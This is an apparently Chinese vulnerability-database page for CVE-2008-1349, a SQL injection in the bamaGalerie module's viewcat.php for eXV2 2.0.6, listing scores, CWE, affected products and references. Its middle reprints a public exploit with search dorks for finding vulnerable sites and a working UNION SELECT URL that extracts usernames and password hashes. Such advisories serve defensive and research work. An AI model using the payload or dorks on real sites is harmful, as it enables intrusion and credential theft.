CVE-2008-1349-漏洞详情-微慑信息网-VulSee.com

CVE-2008-1349

CVSS

7.5

发布时间 :2008-03-17 12:44:00

修订时间 :2009-03-18 01:35:02

NMCOE

[原文]SQL injection vulnerability in viewcat.php in the bamaGalerie (Bama Galerie) 3.03 and 3.041 module for eXV2 2.0.6 allows remote attackers to execute arbitrary SQL commands via the cid parameter.

[CNNVD]bamaGalerie ‘viewcat.php’ SQL注入漏洞(CNNVD-200803-242)

eXV2 2.0.6 bamaGalerie (Bama Galerie) 3.03和 3.041模块的viewcat.php中存在SQL注入漏洞。远程攻击者通过cid参数来执行任意SQL命令。

–
CVSS (基础分值)

CVSS分值:	7.5	[严重(HIGH)]
机密性影响:	PARTIAL	[很可能造成信息泄露]
完整性影响:	PARTIAL	[可能会导致系统文件被修改]
可用性影响:	PARTIAL	[可能会导致性能下降或中断资源访问]
攻击复杂度:	LOW	[漏洞利用没有访问限制 ]
攻击向量:	NETWORK	[攻击者不需要获取内网访问权或本地访问权]
身份认证:	NONE	[漏洞利用无需身份认证]

–
CWE (弱点类目)

CWE-89

[SQL命令中使用的特殊元素转义处理不恰当（SQL注入）]

–
CPE (受影响的平台与产品)

cpe:/a:exv2:exv2:2.0.6
cpe:/a:exv2:bamagalerie:3.03
cpe:/a:exv2:bamagalerie:3.041

–
OVAL (用于检测的技术细节)

未找到相关OVAL定义

–
官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1349 (官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1349 (官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200803-242 (官方数据源) CNNVD

–
其它链接及资源

http://www.milw0rm.com/exploits/5340

(UNKNOWN) MILW0RM 5340

http://www.milw0rm.com/exploits/5244

(UNKNOWN) MILW0RM 5244

http://secunia.com/advisories/29362

(VENDOR_ADVISORY) SECUNIA 29362

http://secunia.com/advisories/29359

(VENDOR_ADVISORY) SECUNIA 29359

http://packetstormsecurity.org/0804-exploits/runcms11a-sql.txt

(UNKNOWN) MISC http://packetstormsecurity.org/0804-exploits/runcms11a-sql.txt

http://xforce.iss.net/xforce/xfdb/41188

(UNKNOWN) XF bamagalerie-viewcat-sql-injection(41188)

http://www.securityfocus.com/bid/28229

(UNKNOWN) BID 28229

–
漏洞信息

漏洞名称:bamaGalerie ‘viewcat.php’ SQL注入漏洞
紧急程度:高危	漏洞类型:SQL注入
发布日期:2008-03-17 00:00:00	更新日期:2009-03-18 00:00:00
攻击路径:远程
详细介绍:
eXV2 2.0.6 bamaGalerie (Bama Galerie) 3.03和 3.041模块的viewcat.php中存在SQL注入漏洞。远程攻击者通过cid参数来执行任意SQL命令。

–
公告与补丁

暂无数据

–
漏洞信息 (5244)

漏洞名称:eXV2 Module bamaGalerie 3.03 Remote SQL Injection Vulnerability (EDBID:5244)
影响平台:php	漏洞类型:webapps
发布日期:2008-03-12	确认状态:Verified
漏洞端口:0	代码作者:S@BUN
系统下载: N/A	代码下载: [点击下载]

##########################################
#
# eXV2 Module bamaGalerie 3.03 SQL Injection
#
# download=http://www.exv2-filecenter.de/modules/mydownloads/singlefile.php?lid=9
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/bamagalerie3"
# DORKS 2 : allinurl :"modules/bamagalerie"
#
###########################################
EXPLOIT :

viewcat.php?cid=-9999999/**/union/**/select/**/0,1,2,3,concat(uname,0x3a,pass),5,6/**/from/**/e_xoops_users/*

###########################################
##################S@BUN####################
###########################################
#####[email protected]#####
###########################################

# milw0rm.com [2008-03-12]

–
漏洞信息

OSVDBID: 42854
漏洞名称:Bama Galerie Module for eXV2 viewcat.php cid Parameter SQL Injection
漏洞位置: Remote / Network Access	利用方式: Information Disclosure, Input Manipulation
漏洞影响:Loss of Confidentiality, Loss of Integrity	解决方式:Solution Unknown
漏洞利用:Exploit Public	公开方式:Uncoordinated Disclosure

–
漏洞描述

Bama Galerie Module for eXV2 contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'viewcat.php' script not properly sanitizing user-supplied input to the 'cid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

–
时间线

公开日期: 2008-03-12	发现日期: Unknow
利用日期:2008-03-12	解决日期:Unknow

一	二	三	四	五	六	日
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30

CVE-2008-1349-漏洞详情

–
CVSS (基础分值)

–
CWE (弱点类目)

–
CPE (受影响的平台与产品)

–
OVAL (用于检测的技术细节)

–
官方数据库链接

–
其它链接及资源

–
漏洞信息

–
公告与补丁

–
漏洞信息 (5244)

–
漏洞信息

–
漏洞描述

–
时间线

–
解决方案

相关推荐

评论抢沙发

微慑网

最新文章

随机文章

微慑标签

热门文章

信息资源

友情链接

域名

安全站点

工具

特效

本站信息

其他操作

赞助本站

微慑信息网专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

觉得文章有用就打赏一下文章作者

非常感谢你的打赏，我们将继续提供更多优质内容，让我们一起创建更加美好的网络世界！

支付宝扫一扫

微信扫一扫

切换注册登录

切换登录注册

– CVSS (基础分值)

– CWE (弱点类目)

– CPE (受影响的平台与产品)

– OVAL (用于检测的技术细节)

– 官方数据库链接

– 其它链接及资源

– 漏洞信息

– 公告与补丁

– 漏洞信息 (5244)

– 漏洞信息

– 漏洞描述

– 时间线

– 解决方案

相关推荐

评论 抢沙发

微慑网

最新文章

随机文章

微慑标签

热门文章

信息资源

友情链接

域名

安全站点

工具

特效

本站信息

其他操作

赞助本站

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

觉得文章有用就打赏一下文章作者

非常感谢你的打赏，我们将继续提供更多优质内容，让我们一起创建更加美好的网络世界！

支付宝扫一扫

微信扫一扫

切换注册登录

切换登录注册

–
CVSS (基础分值)

–
CWE (弱点类目)

–
CPE (受影响的平台与产品)

–
OVAL (用于检测的技术细节)

–
官方数据库链接

–
其它链接及资源

–
漏洞信息

–
公告与补丁

–
漏洞信息 (5244)

–
漏洞信息

–
漏洞描述

–
时间线

–
解决方案

评论抢沙发

微慑信息网专注工匠精神